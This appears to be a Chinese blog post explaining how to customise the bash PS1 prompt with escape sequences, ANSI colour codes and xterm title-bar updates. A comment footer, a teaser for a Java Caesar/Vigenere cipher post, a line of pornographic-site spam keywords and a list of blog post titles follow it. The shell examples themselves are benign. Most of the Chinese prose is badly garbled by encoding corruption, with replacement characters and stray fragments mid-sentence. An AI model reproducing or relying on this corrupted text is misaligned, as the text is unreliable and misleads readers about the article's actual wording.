　　bash-2.04#
　　�q�些提示行�ƈ不是十分漂亮。这也就难怪几�U?nbsp;Linux 版本寚w��认提�C��q�行�?ji��n)升�U�，在其中增加了(ji��n)颜色和更多的信息。但是，即便�(zh��n)�恰好有一个本�w�带有很好的彩色提示行的新式版本�Q�它也不可能是完��无�~�的。�?zh��n)�或许希望在提�C��中增加或更改几种颜色�Q�或者增�?或删�?一些信息。从头开始设计属于�?zh��n)�自己的彩色的、经�q�装饰的提示行�ƈ不难�?/p>
　　提示行基��
　　�?bash 下，可以通过更改 PS1 环境变量的值来讄��提示行，如下所�C�：(x��)
　　$ export PS1="> " >
　　更改�?x��)立即生效，通过��?"export" 定义攑֜��(zh��n)�的 ~/.bashrc 文�g中可��这�U�更改固定下来。只要�?zh��n)�愿意�Q�PS1 可以包含��L��数量的纯文本�Q?/p>
　　$ export PS1="This is my super prompt > " This is my super prompt >
　　��管�q�很有趣�Q�但在提�C��中包含大量静(r��n)态文本�ƈ不是特别有用。大多数定制的提�C��包含诸如用户名、工作目录或��L��名之�cȝ��信息。这些花�i�信息可以帮助�?zh��n)��?shell 世界中遨游。例如，下面的提�C��显�C��?zh��n)�的用户名和主机名�Q?/p>
　　$ export PS1="\u@\H > "drobbins@freebox>
　　�q�个提示行对于那些以多个不同名称的帐��L(f��ng)��录多台机器的人尤为有用，因�ؓ(f��)它可以提醒�?zh��n)��Q��?zh��n)�目前在哪台机器上操作�Q�拥有什么权限�?/p>
　　在上面的�C�Z��中，我们使用�?ji��n)专用的用反斜杠转义的字�W�序列，藉此通知 bash ��用户名和主机名插入提示行中�Q�当�q�些转义字符序列出现�?PS1 变量中时�Q�bash ��׃��(x��)用特定的值替换它们。我们��用了(ji��n)序列 "\u"�Q�表�C�用户名�Q�和 "\H"�Q�表�C�Z��机名的第一部分�Q�。下面是 bash 可识别的全部专用序列的完整列表（�(zh��n)�可以在 bash man page �?"PROMPTING" 部分扑ֈ��q�个列表�Q�：(x��)
　　序列说明
　　\aASCII 响铃字符(也可以键�?\007)
　　\d"Wed Sep 06" 格式的日�?/p>
　　\eASCII 转义字符(也可以键�?\033)
　　\h��L��名的�W�一部分(�?"mybox")
　　\H��L��的全�U?�?"mybox.mydomain.com")
　　\j在此 shell 中通过�?^Z 挂�v的进�E�数
　　\l�?shell 的终端设备名(�?"ttyp4")
　　\n换行�W?/p>
　　\r回�R�W?/p>
　　\sshell 的名�U?�?"bash")
　　\t24 ��时制时�?�?"23:01:01")
　　\T12 ��时制时�?�?"11:01:01")
　\@带有 am/pm �?12 ��时制时�?/p>
　　\u用户�?/p>
　　\vbash 的版�?�?2.04)
　　\VBash 版本(包括补丁�U�别) ?/td>
　　\w当前工作目录(�?"/home/drobbins")
　　\W当前工作目录�?#8220;基名 (basename)”(�?"drobbins")
　　\!当前命��o(h��)在历史缓冲区中的位置
　　\#命��o(h��)�~�号(只要�(zh��n)�键入内容，它就�?x��)在每次提示时篏�?
　　\$如果�(zh��n)�不是超�U�用�?(root)�Q�则插入一�?"$";如果�(zh��n)�是��用户�Q�则昄��一�?"#"
　　\xxx插入一个用三位�?xxx(用零代替未��用的数字�Q�如 "\007")表示�?ASCII 字符
　　\\反斜�?/p>
　　\[�q�个序列应该出现在不�U�d��光标的字�W�序�?如颜色�{义序�?之前。它�?bash 能够正确计算自动换行�?/p>
　　\]�q�个序列应该出现在非打印字符序列之后�?/p>
　　�q�样�Q��?zh��n)�已经知道�?bash 中用反斜杠�{义的全部专用序列。请�E�微演练一下这些序列，以对它们的工作方式获得一些感性认识。在�(zh��n)�做�?ji��n)一些测试之后，下面开始添加颜艌Ӏ?/p>
　　彩色�?/p>
　　��d��颜色相当�Ҏ(gu��)��;�W�一步是设计不带颜色的提�C��。然后，我们所要做的只是添加终�?而不�?bash)可识别的专用转义序列�Q�以使它以彩色显�C�文本的某些部分。标�?Linux �l�端�?X �l�端允许�(zh��n)�设�|�前�?文字)颜色和背景颜�Ԍ��如果需要，�q�可以启�?"bold" 字符。有八种颜色可供我们选择�?/p>
　　颜色是通过�?PS1 中添加专用序列来选择�?-- 基本上是夹在 "\e["(转义开�Ҏ(gu��)��?�?"m" 之间数字倹{��如果指定一个以上的数字代码�Q�则用分号将它们分开。下面是一个颜色代码示例：(x��)
　　"\e[0m"
　　如果��数字代码指定�ؓ(f��)�Ӟ��则它?y��u)�׃�?x��)通知�l�端��前景、背景和加粗讄��重置为它们的默认倹{��?zh��n)�可能会(x��)在在提�C��l�束时��用这个代码，以��(zh��n)�键入的文字成�ؓ(f��)非彩色的。现在，让我们看一下这些颜色代码。请注意下面的抓屏结果：(x��)
　　颜色�?/p>

要��用这个表�Q�首先请查找�(zh��n)�要使用的颜�Ԍ��然后查找对应的前景编�?(30-37) 和背景编�?(40-47)。例如，如果�(zh��n)�喜�Ƣ黑底绿字，则可��编号分别设�?32 �?40。然后打开�(zh��n)�的提示行定义�ƈ在其中添加适当的颜色代码。下面的定义�Q?/p>
　　export PS1="\w> "
　　变�ؓ(f��)�Q?/p>
　　export PS1="\e[32;40m\w> "
　　到现在�ؓ(f��)止，提示行尽��已�l�很不错�?ji��n)，但仍不太完美。在 bash 昄��出工作目录以后，我们需要��?"\e[0m" 序列��颜色重新设�|��ؓ(f��)正常倹{�?/p>
　　export PS1="\e[32;40m\w> \e[0m"
　　�q�个定义��显�C�Z��个漂亮的�l�色提示行，但我们仍需要做一些扫��ַ�作。我们不需要包�?"40" �q�个背景颜色讄��Q�因为它?y��u)��背景设�|��ؓ(f��)黑色�Q�而黑色是默认颜色。此外，�l�色�q�很�?我们通过��d��一�?"1" 颜色代码来修正这个问题，�q�将启用更亮的加�_�文字。除�?ji��n)这个修改之外，我们�q�需要将全部非打印字�W�用专用�?bash 转义序列 "\[" �?"\]" 括�v来。这两个序列通知 bash�Q�被括�v来的字符不占用行上的��M��I�间�Q�这样就使自动换行能够��l�正常工作。没有这两个转义序列�Q�尽��?zh��n)�有�?ji��n)一个非常漂亮的提示行，但是如果�(zh��n)�键入的命��o(h��)恰好到达�l�端的最右端�Q�就�?x��)造成昄��混�ؕ。下面是我们最�l�的提示行：(x��)
　　export PS1="\[\e[32;1m\]\w> \[\e[0m\]"
　　别担�?j��)在同一个提�C��中��用几�U�颜�Ԍ��像下面�q�样�Q?/p>
　　export PS1="\[\e[36;1m\]\u@\[\e[32;1m\]\H> \[\e[0m\]"
　　Xterm 中的乐趣
　　我已说明�?ji��n)如何在提示行中��d��信息和颜�Ԍ��但�?zh��n)��q�可以更�q�一步。�?zh��n)�可以通过在提�C��中添加专用代码来�?X �l�端(�?rxvt �?aterm)的标题栏得到动态更新。�?zh��n)�所要做的只是将下面的序列添加到�(zh��n)�的 PS1 提示行中�Q?/p>
　　"\e]2;titlebar\a"
　　只须用�?zh��n)�希望其出现�?xterm 标题栏中的文字替换子�?"titlebar" 卛_��Q�现在已�l�一切就�l�了(ji��n)!不必使用�?r��n)态文�?�(zh��n)�可以将 bash 转义序列插入标题栏中。请查看下面�q�个�C�Z��Q�它?y��u)��用户名、主机名和当前工作目录显�C�在标题栏中�Q��ƈ定义�?ji��n)一个简短、明亮的�l�色提示行：(x��)
　　export PS1="\[\e]2;\u@\H \w\a\e[32;1m\]>\[\e[0m\] "
　　�q�就是我在上面的抓屏�l�果中所用的那个提示行。我喜欢�q�个提示行，因�ؓ(f��)它将全部信息昄��在标题栏上，而不是显�C�在�l�端上，�l�端对一行可以显�C�多��字�W�有限制。顺便提一句，��保�?"\[" �?"\]" ��?zh��n)�的标题栏序列括�v�?因�ؓ(f��)��q��端而言�Q�这个序列是非打印序�?。将大量信息攑֜�标题栏中的问题是�Q�如果�?zh��n)�使用非图形终�?如系�l�控制台)�Q�则看不到这些信息。�ؓ(f��)�?ji��n)解册��个问题，可以在�(zh��n)��?.bashrc 中添加以下几行：(x��)
　　if [ "$TERM" = "linux" ] then #we're on the system console or maybe telnetting in export PS1="\[\e[32;1m\]\u@\H > \[\e[0m\]" else #we're not on the console, assume an xterm export PS1="\[\e]2;\u@\H \w\a\e[32;1m\]>\[\e[0m\] " fi
　　�q�个 bash 条�g语句��根据当前的�l�端讄��动态设�|�提�C��。�ؓ(f��)�?ji��n)获得一致性，�(zh��n)�一定希望配�|��?zh��n)��?~/.bash_profile�Q�以便它在启动时搜烦(ch��) (source) �(zh��n)�的 ~/.bashrc。确保�?zh��n)��?~/.bash_profile 文�g中有以下�q�样一行：(x��)
　　source ~/.bashrc
　　�q�样�Q�无论�?zh��n)�开启一个登�?shell �q�是一个非��d�� shell�Q�都�?x��)获得同��L(f��ng)��提示行�?/p>
　　好了(ji��n)�Q��?zh��n)�已掌握�?ji��n)提示行魔术。现在尽情��n受一下，制作一个漂亮的彩色提示行吧�Q?/p>

��其自然EVO 2011-11-08 15:39 发表评论

Java之Caesar与Vigenere实现

��其自然EVO — Mon, 07 Nov 2011 02:32:00 GMT
摘要: 1、背景介�l�　　话说目前做所�?#8220;企业”开发的语言基本��集中在�q�用.Net和J2EE上了(ji��n)。又话说�Q�在下很不幸又和Java“同流合污”�?ji��n)一把。现在回惌��v来，真是感慨万千啊～遥想公瑾当年�Q�小乔初嫁了(ji��n)�Q�雄姿英发，��扇�U�巾�Q�谈�W�间�Q�强虏灰飞烟灭。～　　额，下面插播一下正题。其实，目前国内用Java做真正的“企业�U?#8221;得其实�ƈ不是很多�Q�绝�?.. 阅读全文

��其自然EVO 2011-11-07 10:32 发表评论

亚洲成av人片在线天堂无,亚洲精品中文字幕无乱码麻豆,亚洲黄色在线网站

渗透测试必知必�?x��)—Web漏洞

Android客户端捕获http��h��包的�Ҏ(gu��)��

自动化构建方面的知识

为功能测试正名，写给�q�大软�g���试同行

Linux下的高��权限文�g控制

Java之Caesar与Vigenere实现

为功能测试正名，写给�q�大软�g��试同行